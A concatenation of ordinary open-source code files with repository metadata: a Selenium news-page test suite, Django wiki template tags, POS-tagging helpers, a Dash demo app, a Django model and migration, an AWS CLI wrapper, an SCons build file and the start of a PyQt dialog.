    def check_title(self):
        """Return the current browser title."""
        return self.title_()
class TestNewsPage(StartEnd):
    """UI tests for the news section.

    Every test opens a fresh browser, logs in, navigates to the news master
    page, optionally clicks into a sub page, and compares the browser title
    against the expected value from the test data. The original repeated
    this setup/try/except/finally scaffolding verbatim in all eight tests;
    it is factored into the private helpers below, preserving behavior and
    the public test method names.

    NOTE(review): assertEqual runs inside a try that catches Exception, so
    an AssertionError is logged instead of failing the test — kept as in
    the original, but worth confirming.
    """
    logger=get_log("test news_page")
    data=testDataInfo('News')['News']

    def _open_news_page(self):
        """Start a browser, log in, and open the news master page."""
        driver = browser()
        newspage = NewsPage(driver)
        newspage.open_browser_()
        newspage.login_page()
        newspage.load_master_page(
            self.data['master_page'][1]['type'],
            self.data['master_page'][2]['value']
        )
        return newspage

    def _check_title(self, newspage, expected_title, end_message, action=None):
        """Run ``action`` (if any), then compare the page title.

        Errors are logged and the browser is closed; the browser is also
        closed in the finally branch, as in the original tests.
        """
        try:
            if action is not None:
                action(newspage)
            title = newspage.check_title()
            self.assertEqual(title, expected_title)
        except Exception as msg:
            self.logger.error(msg)
            newspage.quit_browser_()
        finally:
            self.logger.info(end_message)
            newspage.quit_browser_()

    def _open_sub_page(self, newspage, page_key, status_key):
        """Click the news sub-tab selected by the test data for ``page_key``."""
        newspage.load_part_page(
            self.data['part_page'][1]['type'],
            self.data['part_page'][2]['value'],
            self.data[page_key][status_key][2]['value']
        )

    def test_news_page(self):
        self.logger.info("Start test news_page")
        newspage = self._open_news_page()
        self._check_title(
            newspage,
            self.data['check_ma'][2]['value'],
            "test news page is end"
        )

    def test_homenews_page(self):
        self.logger.info("Start test homenews_page")
        newspage = self._open_news_page()
        self._check_title(
            newspage,
            self.data['homenews_page']['check_homenews'][2]['value'],
            "test home news page is end",
            lambda page: self._open_sub_page(page, 'homenews_page', 'homenews_status')
        )

    def test_nationalnews_page(self):
        self.logger.info("Start test nationalnews_page")
        newspage = self._open_news_page()
        self._check_title(
            newspage,
            self.data['nationalnews_page']['check_nationalnews'][2]['value'],
            "test nation news page is end",
            lambda page: self._open_sub_page(page, 'nationalnews_page', 'nationalnews_status')
        )

    def test_disportnews_page(self):
        self.logger.info("Start test disportnews_page")
        newspage = self._open_news_page()
        self._check_title(
            newspage,
            self.data['disportnews_page']['check_disportnews'][2]['value'],
            "test disport news page is end",
            lambda page: self._open_sub_page(page, 'disportnews_page', 'disportnews_status')
        )

    def test_sportnews_page(self):
        self.logger.info("Start test sportnews_page")
        newspage = self._open_news_page()
        self._check_title(
            newspage,
            self.data['sportnews_page']['check_sportnews'][2]['value'],
            "test sport news page is end",
            lambda page: self._open_sub_page(page, 'sportnews_page', 'sportnews_status')
        )

    def test_recommandnews_page(self):
        self.logger.info("Start test recommandnews_page")
        newspage = self._open_news_page()

        def open_recommended(page):
            # The recommended article opens in a new browser window.
            ele1 = page.find_element_(
                self.data['recommandnews_page']['ele1'][1]['type'],
                self.data['recommandnews_page']['ele1'][2]['value']
            )
            page.click_(ele1)
            page.switch_new_window_()

        self._check_title(
            newspage,
            self.data['recommandnews_page']['check_re'][2]['value'],
            "test recommandnews page is end",
            open_recommended
        )

    def test_lastfresh_page(self):
        self.logger.info("Start test lastfresh_page")
        newspage = self._open_news_page()

        def open_lastfresh(page):
            ele1 = page.find_elements_(
                self.data['lastfresh_page']['ele1'][1]['type'],
                self.data['lastfresh_page']['ele1'][2]['value']
            )[self.data['lastfresh_page']['status'][2]['value']]
            page.click_(ele1)

        self._check_title(
            newspage,
            self.data['lastfresh_page']['check_fresh'][2]['value'],
            "test lastfresh_page is ok",
            open_lastfresh
        )

    def test_hotclick_page(self):
        self.logger.info("Start test hotclick_page")
        newspage = self._open_news_page()

        def open_hotclick(page):
            ele1 = page.find_elements_(
                self.data['hotclick_page']['ele1'][1]['type'],
                self.data['hotclick_page']['ele1'][2]['value']
            )[self.data['hotclick_page']['status'][2]['value']]
            page.click_(ele1)

        self._check_title(
            newspage,
            self.data['hotclick_page']['check_hot'][2]['value'],
            "test hotclick_page is end",
            open_hotclick
        )
if __name__ == '__main__':
unittest.main()
|
[
"568898699@qq.com"
] |
568898699@qq.com
|
dd16b124781a2995b6cb5b384e46fea48c0c4aea
|
53f30b6b7de96fa40034b96d2696974804e52d45
|
/aswiki/templatetags/aswikitags.py
|
e47e7aad0786b25bdbbc7ce3c2b8e7c28522f6be
|
[
"BSD-3-Clause"
] |
permissive
|
scanner/django-aswiki
|
2829b4d88d7804bfae750f8f285242f27f356790
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
refs/heads/master
| 2021-07-10T12:21:16.982797
| 2021-04-29T21:20:52
| 2021-04-29T21:20:52
| 1,011,246
| 1
| 0
|
BSD-3-Clause
| 2021-04-29T21:20:53
| 2010-10-21T04:50:25
|
Python
|
UTF-8
|
Python
| false
| false
| 12,096
|
py
|
#
# File: $Id: aswikitags.py 1858 2008-10-26 00:46:40Z scanner $
#
"""
Provides the `creole` template filter. This is not really used so much
by the aswiki app as it is by other apps that may want to render
content using creole AND have it know about the aswiki's wiki
topics. This lets any part of your project have creole markup
including working wiki links.
NOTE: The basis for this module was lifted pretty liberally from
http://code.google.com/p/django-wikiapp/
"""
# Python standard lib imports
#
from urllib import quote
# Django imports
#
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core.exceptions import ObjectDoesNotExist
from django.template.defaultfilters import stringfilter
# 3rd party imports
#
import creoleparser
from aswiki.parser import parser as creole_parser
from aswiki.parser import TOPIC_LIST, typogrify
# Model imports
#
from aswiki.models import Topic
from django.contrib.auth.models import User, SiteProfileNotAvailable
# what field in the profile is used to indicate a specific user's wiki
# topic?
#
ASWIKI_USER_TOPIC = getattr(settings, "ASWIKI_USER_TOPIC", "wiki_topic")
###
### This is a template library
###
register = template.Library()
####################################################################
#
@register.inclusion_tag('aswiki/topic_hierarchy.html')
def topic_hierarchy(topic):
    """
    Build the breadcrumb data for a dotted topic name: each component of
    `foo.bar.biz` becomes a (component, dotted-prefix) pair — ('foo','foo'),
    ('bar','foo.bar'), ('biz','foo.bar.biz') — so the template can link each
    crumb to the corresponding ancestor topic.

    Arguments:
    - `topic`: the Topic to generate hierarchy links for, or a plain string
      topic name when the topic does not exist yet.
    """
    if isinstance(topic, basestring):
        parts = topic.split('.')
    else:
        parts = topic.name.split('.')
    prefix = []
    topic_links = []
    for part in parts:
        prefix.append(part)
        topic_links.append((part, '.'.join(prefix)))
    return { 'topic_names' : topic_links,
             'topic' : topic }
###########################################################################
#
@register.filter(name='creole')
@stringfilter
def creole(text, topic = None):
    """
    Template filter: render `text` with the aswiki creole markup parser and
    run the result through typogrify.

    Arguments:
    - `text`: the markup text to be rendered
    - `topic`: optional current Topic, published to the shared TOPIC_LIST
      while rendering so wiki links resolve relative to it
    """
    # We need to lock the TOPIC_LIST before we render using this dialect
    # even though in this instance we do nothing with the topic list
    # that this text refers to.
    #
    try:
        TOPIC_LIST.clear_and_lock()
        TOPIC_LIST.current_topic = topic
        text = typogrify(creole_parser.render(text, environ = TOPIC_LIST))
    finally:
        # Always reset and unlock, even if rendering raised.
        TOPIC_LIST.current_topic = None
        TOPIC_LIST.unlock()
    return text
# Mark the filter output as safe HTML for Django's autoescaping.
creole.is_safe = True
###########################################################################
#
# {% creole %} ... {% endcreole %}
#
class CreoleTextNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
return creole(self.nodelist.render(context))
@register.tag("creole")
def crl_tag(parser, token):
"""
Render the Creole into html. Will pre-render template code first.
"""
nodelist = parser.parse(('endcreole',))
parser.delete_first_token()
return CreoleTextNode(nodelist)
##################################################################
##################################################################
#
class TopicInfoNode(template.Node):
"""
Renders some information about a Topic (subject to the user's permissions)
"""
def __init__(self, topic):
self.topic_var = template.Variable(topic)
def render(self, context):
"""
Basically we render a HTML snippet with the given topic. The
reason this is actually a templatetag is that the user may NOT
have read permission on a topic and what template we use to
render depends on whether they have that permission or not.
"""
try:
topic = self.topic_var.resolve(context)
tmpl = "aswiki/topic_info_frag.html"
if 'user' in context:
user = context['user']
if not topic.permitted(user):
tmpl = "aswiki/topic_info_restricted_frag.html"
t = template.loader.get_template(tmpl)
return t.render(template.Context({ 'topic': topic, 'user': user },
autoescape = context.autoescape))
except template.VariableDoesNotExist:
return ''
####################################################################
#
@register.tag("topic_info")
def do_topic_info(parser, token):
"""
Handles parsing a 'topic_info' template tag. We expect one
argument - a variable containing the topic.
Arguments:
- `parser`: The django template parser object
- `token`: The raw contents of our topic_info tag.
"""
try:
tag_name, topic = token.split_contents()
except ValueError:
raise "%r tag requires one argument" % token.contents.split()
return TopicInfoNode(topic)
##################################################################
##################################################################
#
class EmbedASWikiTopicNode(template.Node):
"""
Given a topic name, if the user has permission to see that topic,
returns the rendered content of the topic.
If no topic exists by that name, it returns a link to that topic
so that it can be created.
"""
##################################################################
#
def __init__(self, topic):
"""
We expect the topic name.. if it is in single or double quotes
we treat it as the exact name of the topic. Otherwise we treat
it as a template variable to lookup.
"""
self.topic = topic
return
##################################################################
#
def render(self, context):
"""
Return an embedded wiki topic. We will return one of three
things. '' if the user does not have permission to see this
topic. A link to the topic if it does not exist, or the
formatted contents of the topic, with a link to the
topic.
Arguments:
- `context`: The django context object.
"""
try:
if self.topic[0] == self.topic[-1] and self.topic[0] in ('"', "'"):
# If the topic is surrounded as quotes treat it as the name
# of the topic.
#
topic_name = self.topic[1:-1]
else:
# Otherwise, treat it as a variable name that has the name
# of the topic in it.
#
topic_name = template.Variable(self.topic).resolve(context)
try:
topic = Topic.objects.get(lc_name = topic_name.lower())
except Topic.DoesNotExist:
# If the topic does not exist, then return a link to the
# topic.
#
if topic_name is None or len(topic_name.strip()) == 0:
return ""
return u'<a href="%s">%s</a>' % (reverse('aswiki_topic',
args=(topic_name,)),
topic_name)
# See if the user has pemission to view this topic. If they
# do not return an empty string.
#
user = None
if 'user' in context:
user = context['user']
if not topic.permitted(user):
return ''
elif topic.restricted:
return ''
# Otherwise they are permitted and the topic exists. Return
# a link to the topic and the topic's rendered content.
#
t = template.loader.get_template('aswiki/embedded_topic_frag.html')
return t.render(template.Context({ 'topic': topic, 'user': user },
autoescape = context.autoescape))
except template.VariableDoesNotExist:
return ''
####################################################################
#
@register.tag("embed_aswiki_topic")
def do_embed_aswiki_topic(parser, token):
"""
Handles the 'embed_aswiki_topic' template tag. We expect one
argument -- the name of the topic to embed. It can be a 'string'
or a variable. If it is surrounded by single or double quotes it
will be treated as a string, otherwise it will be treated as a
template variable.
Arguments:
- `parser`: The django template parser object
- `token`: The raw contents of our topic_info tag.
"""
try:
tag_name, topic = token.split_contents()
except ValueError:
raise "%r tag requires one argument" % token.contents.split()
return EmbedASWikiTopicNode(topic)
####################################################################
#
@register.simple_tag
def user_wikipage(user):
"""
A simple template tag that will render a link to the user's wiki
page if the user has a profile and the profile has an attribute
that is the value of 'settings.ASWIKI_USER_TOPIC'
NOTE: ASWIKI_USER_TOPIC defaults to 'wiki_topic'
The purpose is that whereever we would display a username, if the
user has a wiki topic associated with them by their profile, we
display the link to their wiki topic. This way anywhere on your
site that you refer to users, you can also refer to that user's
wiki topic if they have one.
If the user has no wiki topic associated with them via their
profile we return ''
Arguments:
- `user`: The user object. If this is not a django.contrib.auth.models.User
object we return ''.
"""
if not isinstance(user, User):
return ""
try:
profile = user.get_profile()
except (SiteProfileNotAvailable, ObjectDoesNotExist):
return ""
if profile is None:
return ""
if not hasattr(profile, ASWIKI_USER_TOPIC):
return ""
try:
topic_name = getattr(profile, ASWIKI_USER_TOPIC, None)
if topic_name is None or topic_name.strip() == "":
return ""
topic = Topic.objects.get(lc_name = topic_name.lower())
return '<a href="%s">%s</a>' % (topic.get_absolute_url(),topic_name)
except Topic.DoesNotExist:
return '<a href="%s" class="%s">%s</a>' % \
(reverse('aswiki_topic', args = (topic_name,)),
Topic.objects.css_class_name(topic_name), topic_name)
####################################################################
#
@register.simple_tag
def username_or_wikipage(user):
"""
This is like 'user_wiki_page' except that if the user does not have a wiki
topic set (whether it exists or not is not the same as not having one set)
we will return a string of 'username (full name)'. If their full name is
the empty string we will omit the '(full name)' part.
Arguments:
- `user`: The user object. If this is not a django.contrib.auth.models.User
object we return ''.
"""
if not isinstance(user, User):
return ""
topic_url = user_wikipage(user)
if topic_url != "":
return topic_url
full_name = user.get_full_name().strip()
if full_name != "":
return "%s (%s)" % (user.username, full_name)
return user.username
|
[
"scanner@apricot.com"
] |
scanner@apricot.com
|
dc83c5b64a4aace3f13366cfdd4e82eb64046ca8
|
c2c51cbeaaf62aa824c7546eeea5fc8f82564cc0
|
/helper_funcs.py
|
005332518a209b2ef7b08b484b75d0d99cf6dc05
|
[] |
no_license
|
matanby/pos_tagging
|
4ac91aa32a5fc720a8c685de745006064a46a4fa
|
91d8968ecade1219e86bf3a94bb18decfa1d5645
|
refs/heads/master
| 2021-04-30T17:32:26.562428
| 2017-01-27T13:59:46
| 2017-01-27T14:03:38
| 80,211,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,421
|
py
|
from __future__ import division
import sys
from numpy import random
import numpy as np
import parse
def loss(x, x_hat):
"""
Calculates and returns the loss of two given POS tags.
:param x: The correct POS tag.
:param x_hat: The inferred POS tag.
"""
T = len(x)
return sum([1 for i in xrange(T) if x[i] != x_hat[i]]) / T
def avg_loss(X, X_hat):
"""
Calculates and returns the average loss two given POS tag sets.
:param X: The correct POS tags set.
:param X_hat: The inferred POS tags set.
"""
return np.mean([loss(x, x_hat) for x, x_hat in zip(X, X_hat)])
def dot(v1, v2):
"""
Calculates and returns the dot product of a sparse vector
containing only 0/1 values, and a full vector.
:param v1: The sparse vector (contains indexes of '1's)
:param v2: The full vector.
"""
return sum(v2[i] for i in v1)
def frange(x, y, jump):
"""
Generator for range of floating numbers.
:param x: The start value of the generator.
:param y: The end value of the generator.
:param jump: The increment size of each generated value.
"""
while x < y:
yield x
x += jump
def get_data(k=5, n=1, shuffle=True, max_sentences=sys.maxint):
"""
Reads and returns the input data along with the
sets of unique words and POS tags.
:param shuffle: Should the data be shuffled?
:param k: cross-validation factor, if set to e.g. 4, size of test set is 1/4 of data
:param n: number of train/test sets to draw
:param max_sentences: maximal number of sentences to read from file
:return:
x_train - Train set of POS tags.
x_test - Test set of POS tags.
y_train - Train set of sentences.
y_test - Test set of sentences.
suppx - a set of the values of X (parts of speech)
suppy - a set of the values of Y (words)
"""
data, xvals, yvals = parse.collect_sets("data_split.gz", k=k, n=n, max_sentences=max_sentences)
if shuffle:
random.shuffle(data['train'])
random.shuffle(data['test'])
train_data = data['train']
x_train = [s[0] for s in train_data]
y_train = [s[1] for s in train_data]
test_data = data['test']
x_test = [s[0] for s in test_data]
y_test = [s[1] for s in test_data]
suppx = sorted(list(xvals))
suppy = sorted(list(yvals))
return x_train, x_test, y_train, y_test, suppx, suppy
|
[
"matan.ben.yosef@gmail.com"
] |
matan.ben.yosef@gmail.com
|
904c76d472af5ae3a14afc8b030afaab5968691c
|
85669e8035063261890b7c0532b11e4ac9e1c597
|
/docs/demos/06-integration-and-migration/switch_templates.py
|
fc348ae137cc46832f671f75d5aba4ff6753136b
|
[
"MIT"
] |
permissive
|
RenaudLN/dash-labs
|
6c0539f290d398ba66f3f559ff852c36e9c301e1
|
f12244a6b923ee97e7409fb59ae6dffde19056ab
|
refs/heads/main
| 2023-06-01T01:13:41.230423
| 2021-06-10T13:23:12
| 2021-06-10T13:23:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,657
|
py
|
import dash
import dash_labs as dl
import dash_bootstrap_components as dbc
import plotly.express as px
import plotly.graph_objects as go
# Make app and template
app = dash.Dash(__name__, plugins=[dl.plugins.FlexibleCallbacks()])
tpl = dl.templates.DbcRow(app, title="Gapminder", left_cols=4, figure_template=True)
# Load and preprocess dataset
df = px.data.gapminder()
years = sorted(df.year.drop_duplicates())
continents = list(df.continent.drop_duplicates())
@app.callback(
args=dict(
year=tpl.new_slider(years[0], years[-1], step=5, value=years[-1], label="Year"),
continent=tpl.new_checklist(continents, value=continents, label="Continents"),
logs=tpl.new_checklist(
["log(x)"],
value="log(x)",
label="Axis Scale",
),
),
output=tpl.new_graph(),
template=tpl,
)
def callback(year, continent, logs):
# Let parameterize infer output component
year_df = df[df.year == year]
if continent:
year_df = year_df[year_df.continent.isin(continent)]
if not len(year_df):
return go.Figure()
title = f"Life Expectancy ({year})"
return (
px.scatter(
year_df,
x="gdpPercap",
y="lifeExp",
size="pop",
color="continent",
hover_name="country",
log_x="log(x)" in logs,
size_max=60,
title=title,
)
.update_layout(margin=dict(l=0, r=0, b=0))
.update_traces(marker_opacity=0.8)
)
app.layout = dbc.Container(fluid=True, children=tpl.children)
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"noreply@github.com"
] |
RenaudLN.noreply@github.com
|
1314464d44b5b1a8e5aa8e3eb5a27559609a8831
|
33a50bb13812090a36257078522b798762978c66
|
/vir2real/migrations/0002_auto__add_field_virtual2realadapterfieldmap_order_id.py
|
c07c048a8d7bbc2b02c87a642e47441da6d5684a
|
[] |
no_license
|
aa3632840/quanlin
|
52ac862073608cd5b977769c14a7f6dcfb556678
|
2890d35fa87367d77e295009f2d911d4b9b56761
|
refs/heads/master
| 2021-01-10T22:05:14.076949
| 2014-10-25T02:28:15
| 2014-10-25T02:28:15
| 23,178,087
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,311
|
py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Virtual2RealAdapterFieldMap.order_id'
db.add_column(u'vir2real_virtual2realadapterfieldmap', 'order_id',
self.gf('django.db.models.fields.IntegerField')(default=0, max_length=5),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Virtual2RealAdapterFieldMap.order_id'
db.delete_column(u'vir2real_virtual2realadapterfieldmap', 'order_id')
models = {
u'vir2real.person': {
'Meta': {'object_name': 'Person'},
'alipay_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'phone_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'qq_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
u'vir2real.virtual2realadapterclassmap': {
'Meta': {'object_name': 'Virtual2RealAdapterClassMap'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'real_class_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'virtual_class': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualClass']"})
},
u'vir2real.virtual2realadapterfieldmap': {
'Meta': {'object_name': 'Virtual2RealAdapterFieldMap'},
'class_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.Virtual2RealAdapterClassMap']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_id': ('django.db.models.fields.IntegerField', [], {'max_length': '5'}),
'real_field_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'virtual_field': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualFeild']"})
},
u'vir2real.virtualclass': {
'Meta': {'object_name': 'VirtualClass'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'vir2real.virtualdata': {
'Meta': {'object_name': 'VirtualData'},
'can_be_restore_real': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'erro_msg': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source_line': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'virtual_real_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.Virtual2RealAdapterClassMap']"})
},
u'vir2real.virtualfeild': {
'Meta': {'object_name': 'VirtualFeild'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'pclass': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualClass']"}),
'type': ('django.db.models.fields.CharField', [], {'default': "'TYPE_CHAR'", 'max_length': '50'})
}
}
complete_apps = ['vir2real']
|
[
"262708239@qq.com"
] |
262708239@qq.com
|
0bed7c8b75cdf2078b82da54a9c4976787247f0f
|
4a7ad2535f7e05437eca3e15c89e1e1cc224395c
|
/Product/models.py
|
c97847721c2ef096dd14b31536b894be5055bb84
|
[] |
no_license
|
Twinkle126/InventoryManagement
|
e645c016141208f0ca6ae4ba3938f27ce91526b5
|
455fbbfee1a88c469f87c189acb34ad8cd558db7
|
refs/heads/master
| 2023-06-28T08:10:23.837678
| 2021-07-26T02:42:45
| 2021-07-26T02:42:45
| 389,485,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
from Invoice.models import Invoice
from django.db import models
# from Merchant.models import Buyer, Seller
# Create your models here.
class Item(models.Model):
product_name = models.CharField(max_length=50)
quantity = models.IntegerField(blank=True, null=True)
invoice = models.ForeignKey(Invoice, on_delete=models.CASCADE)
base_price = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
tax = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(auto_now_add=True, blank=True)
modified_at = models.DateTimeField(auto_now_add=True, blank=True)
@property
def amount(
self,
):
"""
returns the total amount.
"""
if self.base_price:
return self.base_price + self.tax
else:
return 0
def __str__(self):
return self.product_name
|
[
"twinkle.yadav@renewbuy.com"
] |
twinkle.yadav@renewbuy.com
|
0c8c5da548afa55ab87e53d6f3e1bd743385ded6
|
a34f451c6d4ab2240965a8bc02ddd7f1ed232cb4
|
/Classifier/Classifier.py
|
67deca4278c97c0f84ea7f57f39089f4f9857da7
|
[] |
no_license
|
zoox101/Tonk
|
397169ce54bad4efa61808d2fb4af07468d1ec5c
|
562a9ad316d992d6f23598ba83f7e6b7b1de943b
|
refs/heads/master
| 2021-09-25T03:57:47.574196
| 2018-10-17T19:16:29
| 2018-10-17T19:16:29
| 113,006,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,526
|
py
|
#------------------------------------------------------------------------------#
# Imports
#------------------------------------------------------------------------------#
import pandas as pd
import pickle
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import accuracy_score
#------------------------------------------------------------------------------#
# Training Classifier
#------------------------------------------------------------------------------#
df = pd.read_csv('simulate.csv')
xs = df[['asum', 'acount', 'bcount', 'turn']]
ys = df['win']
SPLIT = int(0.7 * len(xs))
xs_train, xs_test = xs[:SPLIT], xs[SPLIT:]
ys_train, ys_test = ys[:SPLIT], ys[SPLIT:]
#Creating random forest
lr = LogisticRegression(random_state=0); lr.fit(xs_train, ys_train);
rf = RandomForestClassifier(random_state=0); rf.fit(xs_train, ys_train);
gbm = GradientBoostingClassifier(random_state=0); gbm.fit(xs_train, ys_train);
#Getting model scores
accuracy_score(ys_test, lr.predict(xs_test))
accuracy_score(ys_test, rf.predict(xs_test))
accuracy_score(ys_test, gbm.predict(xs_test))
#Saving output
pickle.dump(gbm, open('TonkPredictor.p', 'wb'))
x = pd.DataFrame([10,3,5,1], index=xs.columns).transpose()
gbm.predict_proba(x)
#------------------------------------------------------------------------------#
#
#------------------------------------------------------------------------------#
|
[
"william@thebookers.net"
] |
william@thebookers.net
|
01330cf4614af2857ae6b6437eb545355cc98770
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/greengrass_read/logger-definition_list.py
|
e93a22128bd3c013cfc4137367d69663cfd6d93f
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,397
|
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import read_no_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/list-logger-definitions.html
if __name__ == '__main__':
"""
create-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/create-logger-definition.html
delete-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/delete-logger-definition.html
get-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/get-logger-definition.html
update-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/update-logger-definition.html
"""
add_option_dict = {}
#######################################################################
# setting option use
# ex: add_option_dict["setting_matching_parameter"] = "--owners"
# ex: add_option_dict["setting_key"] = "owner_id"
#######################################################################
# single parameter
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
read_no_parameter("greengrass", "list-logger-definitions", add_option_dict)
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
e32ea49205f86c9566ed076ee12b55d8d3be92f7
|
63fb62328d90bd5ab25e31f81e0dc99033f65413
|
/custom_transformer.py
|
8041cc6948ee9620f564c889ae83a1df17eac634
|
[] |
no_license
|
johanlaursen/mlflow_ork
|
130053c5d8c0515739ef3ea0d9a950ea77ad9923
|
db75848942aa658e9c6e4c828ce74a84f7b1a149
|
refs/heads/main
| 2023-04-09T01:08:00.320469
| 2021-04-21T14:24:22
| 2021-04-21T14:24:22
| 360,196,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
import numpy as np
class Transform():
def __init__(self):
pass
def fit(self,X,Y=None):
return self
def transform(self,df):
df = df.copy()
deg_enc= {'NNE':22.5,
'NE':45,
'E':90,
'ESE':112.5,
'SE':135,
'SSE':157.5,
'SW':225,
'SSW':202.5,
'S':180,
'WSW':247.5,
'W':270,
'WNW':292.5,
'NW':315,
'NNW':337.5,
'N':0,
'ENE':67.5}
speed = df.pop("Speed")
df["Direction"] = df["Direction"].map(deg_enc)
dir_rad = np.radians(df.pop("Direction"))
df["Wx"] = speed*np.cos(dir_rad)
df["Wy"] = speed*np.sin(dir_rad)
X = df[["Wx","Wy"]]
return X
|
[
"jocl@myVM.yqjrw1uhtbwehkpgrqlx5ujdif.fx.internal.cloudapp.net"
] |
jocl@myVM.yqjrw1uhtbwehkpgrqlx5ujdif.fx.internal.cloudapp.net
|
4092aebe47a3d3608dc5e285639c60170872d782
|
7986e3195b1afa43fde8880d07d14524456ddab7
|
/Test/BlendTest/SConstruct
|
5689caa1041cdf31df424a0dc140bcb73f6f97c6
|
[
"MIT"
] |
permissive
|
bugsbycarlin/Honey
|
813250e118805aaf9b55495714a3ae5edd7fafb6
|
56902979eb746c8dff5c8bcfc531fbf855c0bae5
|
refs/heads/master
| 2020-03-21T17:26:32.796500
| 2019-11-21T02:03:24
| 2019-11-21T02:03:24
| 138,832,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
import os
honey_version = "0_25"
env=Environment()
env.Append(CXXFLAGS = "-std=c++11")
libraries = ["libHoney.a", "boost_filesystem-mt", "boost_system-mt"]
env.AppendUnique(FRAMEWORKS = Split("OpenGL SDL2 SDL2_image SDL2_mixer SDL2_ttf"))
BlendTest = env.Program(target = "BlendTest",
source = Glob("./Source/*.cpp"),
LIBS = libraries,
LIBPATH="../../Engine/Build/%s/Library" % honey_version,
CPPPATH="../../Engine/Build/%s/Includes" % honey_version)
Default()
def cleanObjects(target, source, env):
os.system("rm ./Source/*.o")
cleanup = Command("cleanObjects", [], cleanObjects)
Depends(cleanup, BUILD_TARGETS)
#BUILD_TARGETS.append("cleanObjects")
|
[
"bugsby.carlin@gmail.com"
] |
bugsby.carlin@gmail.com
|
|
15d6163f4f154df42fae7bf78b86ed0595f21ac7
|
cead5aa67c0c45038917f306fefe31b53b5b639f
|
/temp/PyQt/comunication_objects/t1.py
|
71358a39239cb2f2df9bf8c574960572d4d688bd
|
[] |
no_license
|
songaal/AutoLogin
|
0a79400a88f1823aebfb819c98b489aeb267a679
|
778f30dd92dc4dba3d0a632511113bfe145d1b94
|
refs/heads/master
| 2022-02-27T23:13:54.152894
| 2019-09-22T16:27:41
| 2019-09-22T16:27:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,795
|
py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from selenium import webdriver
import time
import threading
from bs4 import BeautifulSoup as soup
import requests
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(388, 179)
self.lineEdit_2 = QtWidgets.QLineEdit(Dialog)
self.lineEdit_2.setGeometry(QtCore.QRect(100, 100, 271, 21))
font = QtGui.QFont()
font.setFamily("Yu Gothic")
